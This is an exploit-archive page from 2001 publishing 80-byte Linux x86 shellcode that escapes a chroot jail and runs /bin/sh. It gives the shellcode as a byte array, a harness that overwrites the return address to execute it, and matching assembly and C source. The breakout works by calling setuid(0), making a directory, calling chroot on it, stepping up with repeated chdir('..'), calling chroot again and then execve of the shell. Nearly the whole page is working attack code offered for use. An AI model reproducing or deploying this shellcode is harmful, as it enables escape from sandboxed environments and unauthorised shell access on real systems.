[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux chroot()/execve() code
# Published : 2001-01-13
# Author : preedator
# Previous Title : BSD Passive Connection Shellcode
# Next Title : solaris/SPARC portbinding shellcode 


/* This is Linux chroot()/execve() code.It is 80 bytes long.I have some    *
 * ideas how to make it smaller, but till then use this one.               *
 *                                         signed predator                 *
 *                                         linux registered user : 181116  *
 *                                         preedator(at)sendmail(dot)ru    *
 ***************************************************************************/

char sc[]="x31xc0x31xdbx31xc9xb0x17xcdx80xebx36x5ex88x46x0a"
          "x8dx5ex05xb1xedxb0x27xcdx80x31xc0xb0x3dxcdx80x83"
          "xc3x02xb0x0cxcdx80xe0xfaxb0x3dxcdx80x89x76x08x31"
          "xc0x88x46x07x89x46x0cx89xf3x8dx4ex08x89xc2xb0x0b"
          "xcdx80xe8xc5xffxffxff/bin/sh..";

int main(){
  int *ret=(int *)(&ret+2);
  printf("len : %dn",strlen(sc));
  *ret=(int)sc;
}


// Asm code
/*********************************************
 *int main(){                                *
 * __asm__(" xorl %eax,%eax           n"    *
 *	   " xorl %ebx,%ebx           n"    *
 *         " xorl %ecx,%ecx           n"    *
 *	   " movb $0x17,%al           n"    *
 *	   " int  $0x80               n"    *
 *         " jmp 0x36                 n"    *
 *         " popl %esi                n"    *
 *	   " movb %al,0xa(%esi)       n"    *
 *         " leal 0x5(%esi),%ebx      n"    *
 *	   " movb $0xed,%cl           n"    *
 *	   " movb $0x27,%al           n"    *
 *	   " int $0x80                n"    *
 *         " xorl %eax,%eax           n"    *
 *         " movb $0x3d,%al           n"    *
 *	   " int $0x80                n"    * 
 *	   " addl $0x2,%ebx           n"    *
 *         " movb $0xc,%al            n"    *
 *	   " int $0x80                n"    *
 *         " loopne -0x06             n"    *
 *         " movb $0x3d,%al           n"    *
 *	   " int $0x80                n"    *
 *	   " movl %esi,0x8(%esi)      n"    * 
 *         " xorl %eax,%eax           n"    * 
 *         " movb %al,0x7(%esi)       n"    *
 *         " movl %eax,0xc(%esi)      n"    *
 *         " movl %esi,%ebx           n"    *
 *         " leal 0x8(%esi),%ecx      n"    *
 *         " movl %eax,%edx           n"    *
 *         " movb $0xb,%al            n"    *
 *         " int $0x80                n"    *
 *         " call -0x3b               n"    *
 *         " .string "/bin/sh.."    n");  *
 *}                                          *
 *********************************************/ 

//C code
/**********************************************
*int main(){                                  *
*  char *sh[2]={"/bin/sh",NULL};              *
*  int gg=0xed                                *
*  mkdir("sh..",gg);			      *
*  chroot("sh..");			      *
*  while (gg!=0){                             *
*     chdir("..");gg--;                       *
*  }                                          *
* chroot("..");                               *
* execve(sh[0],sh,NULL);                      *
*}                                            *
***********************************************/


// www.Syue.com [2001-01-13]